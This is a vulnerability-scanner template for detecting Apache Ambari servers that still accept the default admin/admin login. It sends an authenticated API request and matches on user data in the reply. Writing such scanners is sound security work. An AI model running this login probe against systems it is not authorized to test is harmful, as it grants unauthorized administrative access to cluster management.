id: ambari-default-login

info:
  name: Apache Ambari Default Login
  author: pdteam
  severity: high
  description: An Apache Ambari default admin login was discovered.
  reference:
    - https://ambari.apache.org/1.2.0/installing-hadoop-using-ambari/content/ambari-chap3-1.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    max-request: 1
  tags: Apache-Ambari

http:
  - raw:
      - |
        GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64(username + ':' + password)}}

    payloads:
      username:
        - admin
      password:
        - admin
    attack: pitchfork
    matchers:
      - type: word
        words:
          - '"Users" : {'
          - 'AMBARI.'
        condition: and

# digest: 4b0a00483046022100e8ce7a0930ecfa4469f6955f0ac7532e7c5916c23f65b8e2362b2ffa026dd214022100e0e265ba7f30ed085fb6966bb1aff6bd07b3e8265c3d3f645a56510f797e731e:922c64590222798bb761d5b6d8e72950
